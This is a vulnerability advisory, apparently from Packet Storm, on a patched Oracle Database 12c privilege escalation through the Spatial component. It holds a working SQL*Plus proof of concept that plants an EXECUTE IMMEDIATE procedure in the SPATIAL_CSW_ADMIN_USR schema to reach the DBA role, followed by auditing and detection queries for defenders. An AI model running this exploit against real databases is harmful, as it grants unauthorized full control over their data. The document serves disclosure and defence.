Oracle Database 12.1.0.2 Spatial Component Privilege Escalation

03 Feb 2023 | Reported by Emad Al-Mousa | Type: packetstorm | Source: packetstormsecurity.com

Oracle Database Privilege Escalation Through Oracle Spatial Component, Risk Level: High, Fixed in Oracle CPU OCT 2021, Escalation to "DBA" Role, Defensive Techniques: configure auditin

Code
`Title: Oracle Database Privilege Escalation Through Oracle Spatial Component  
Product: Database  
Manufacturer: Oracle  
Affected Version(s): 12.1.0.2  
Tested Version(s): 12cR1  
Risk Level: High  
Solution Status: Fixed in Oracle Critical Patch Update October 2021  
CVE Reference: N/A, Backported in Oracle CPU OCT 2021  
Author of Advisory: Emad Al-Mousa  
  
Overview:  
  
Privilege escalation is a well-known security vulnerability (exploitation technique). Attackers seek to compromise IT systems for multiple objectives such as data exfiltration, causing outages, etc.  
  
  
*****************************************  
Vulnerability Details:  
  
The following is a privilege escalation vulnerability where an attacker can escalate his/her account permissions to the "DBA" role. The DBA role in Oracle is a very powerful role where the user can view & edit any data within the database, create database objects (tables, malicious code, etc.) and perform many other harmful activities. The vulnerability exists if the database system has the Oracle "Spatial" component installed. This vulnerability existed in Oracle 12cR1 and a backport fix was issued in October 2021.  
  
To check if Oracle Spatial Component is installed, run the following SQL query as it will list ALL installed components within the database system:  
  
SQL> select comp_name from dba_registry;  
  
  
*****************************************  
Proof of Concept (PoC):  
  
// I will create an account called ironman using the SYS account. The account will be granted "create session" to connect to the database, plus the "create any procedure" and "execute any procedure" permissions:  
  
sqlplus / as sysdba  
  
SQL> create user ironman identified by iron_123;  
  
SQL> grant create session to ironman;  
  
SQL> grant create any procedure to ironman;  
  
  
SQL> grant execute any procedure to ironman;  
  
SQL> exit;  
  
// I will now connect as the newly created account "ironman" using SQL*Plus  
  
sqlplus ironman/iron_123  
  
SQL> show user  
  
USER is "IRONMAN"  
  
SQL> select * from session_roles;  
  
no rows selected  
  
SQL> create or replace procedure SPATIAL_CSW_ADMIN_USR.hulk (SQL_TEXT IN VARCHAR2) as  
  
BEGIN  
  
EXECUTE IMMEDIATE (SQL_TEXT);  
  
END hulk;  
/  
  
  
SQL> execute SPATIAL_CSW_ADMIN_USR.hulk('grant DATAPUMP_IMP_FULL_DATABASE to ironman');  
  
  
SQL> select * from session_roles;  
  
no rows selected  
  
SQL> set role DATAPUMP_IMP_FULL_DATABASE;  
  
// ironman account is escalated to the role DATAPUMP_IMP_FULL_DATABASE  
  
SQL> select * from session_roles;  
  
ROLE  
  
--------------------------------------------------------------------------------  
  
DATAPUMP_IMP_FULL_DATABASE  
  
EXP_FULL_DATABASE  
  
SELECT_CATALOG_ROLE  
  
HS_ADMIN_SELECT_ROLE  
  
HS_ADMIN_ROLE  
  
HS_ADMIN_EXECUTE_ROLE  
  
EXECUTE_CATALOG_ROLE  
  
IMP_FULL_DATABASE  
  
8 rows selected.  
  
// the next escalation level is to DBA role !!  
  
SQL> grant dba to ironman;  
  
SQL> set role dba;  
  
SQL> select * from session_roles;  
  
ROLE  
  
--------------------------------------------------------------------------------  
  
DBA  
  
SELECT_CATALOG_ROLE  
  
HS_ADMIN_SELECT_ROLE  
  
HS_ADMIN_ROLE  
  
HS_ADMIN_EXECUTE_ROLE  
  
EXECUTE_CATALOG_ROLE  
  
DELETE_CATALOG_ROLE  
  
EXP_FULL_DATABASE  
  
IMP_FULL_DATABASE  
  
DATAPUMP_EXP_FULL_DATABASE  
  
DATAPUMP_IMP_FULL_DATABASE  
  
ROLE  
  
--------------------------------------------------------------------------------  
  
GATHER_SYSTEM_STATISTICS  
  
SCHEDULER_ADMIN  
  
XDBADMIN  
  
XDB_SET_INVOKER  
  
JAVA_ADMIN  
  
JAVA_DEPLOY  
  
WM_ADMIN_ROLE  
  
CAPTURE_ADMIN  
  
OPTIMIZER_PROCESSING_RATE  
  
EM_EXPRESS_ALL  
  
EM_EXPRESS_BASIC  
  
22 rows selected.  
  
Conclusion:  
  
The account ironman has been successfully elevated to the "DBA" role, which is the highest database role in the Oracle database system.  
  
  
*****************************************  
Defensive Techniques:  
  
Configure auditing to catch any privilege escalation attempts.  
Review database account permissions on a regular basis.  
Ensure database accounts have strong passwords, and rotate passwords regularly if possible.  
Perform VA (vulnerability assessment) scans on a regular basis.  
Proactively patch your systems and database systems.  
  
  
*****************************************  
References:  
https://www.oracle.com/security-alerts/cpuoct2021.html  
https://databasesecurityninja.wordpress.com/2021/10/22/oracle-database-privilege-escalation-through-oracle-spatial-component/comment-page-1/  
  
Credit:   
Security-In-Depth Contributors: Emad Al-Mousa  
  
`
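
The first two defensive techniques above (auditing and permission review), sketched as an added example that is not part of the original advisory. It assumes an Oracle 12c database with the unified audit views available and a session with DBA/AUDIT_ADMIN rights; the policy name priv_esc_watch is hypothetical.

```sql
-- Added example, not from the advisory. Run as a DBA / AUDIT_ADMIN account.

-- 1) Permission review: grantees that are not Oracle-maintained and hold
--    either of the two ANY privileges the PoC account was given.
SELECT p.grantee, p.privilege, p.admin_option
FROM   dba_sys_privs p
WHERE  p.privilege IN ('CREATE ANY PROCEDURE', 'EXECUTE ANY PROCEDURE')
AND    p.grantee NOT IN (SELECT username FROM dba_users WHERE oracle_maintained = 'Y')
AND    p.grantee NOT IN (SELECT role FROM dba_roles WHERE oracle_maintained = 'Y')
ORDER  BY p.grantee, p.privilege;

-- 2) Permission review: status and grants of the Spatial schema named in the PoC.
SELECT username, account_status
FROM   dba_users
WHERE  username = 'SPATIAL_CSW_ADMIN_USR';

SELECT granted_role AS granted, admin_option
FROM   dba_role_privs
WHERE  grantee = 'SPATIAL_CSW_ADMIN_USR'
UNION ALL
SELECT privilege, admin_option
FROM   dba_sys_privs
WHERE  grantee = 'SPATIAL_CSW_ADMIN_USR';

-- 3) Auditing: record every use of the two ANY privileges, plus GRANT and
--    SET ROLE statements. "priv_esc_watch" is a hypothetical policy name.
--    SET ROLE is audited for all users, so expect volume on busy systems.
CREATE AUDIT POLICY priv_esc_watch
  PRIVILEGES CREATE ANY PROCEDURE, EXECUTE ANY PROCEDURE
  ACTIONS GRANT, SET ROLE;

AUDIT POLICY priv_esc_watch;

-- 4) Detection: audited events where a user touched an object in another
--    schema (the PoC creates and runs a procedure in a schema it does not
--    own), or issued GRANT / SET ROLE.
SELECT event_timestamp, dbusername, action_name, object_schema,
       object_name, system_privilege_used, sql_text
FROM   unified_audit_trail
WHERE  unified_audit_policies LIKE '%PRIV_ESC_WATCH%'
AND    (action_name IN ('GRANT', 'SET ROLE') OR object_schema <> dbusername)
ORDER  BY event_timestamp;
```

Rows from query 1 that cannot be justified are candidates for revocation; rows from query 4 where dbusername differs from object_schema deserve a look at the sql_text column.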
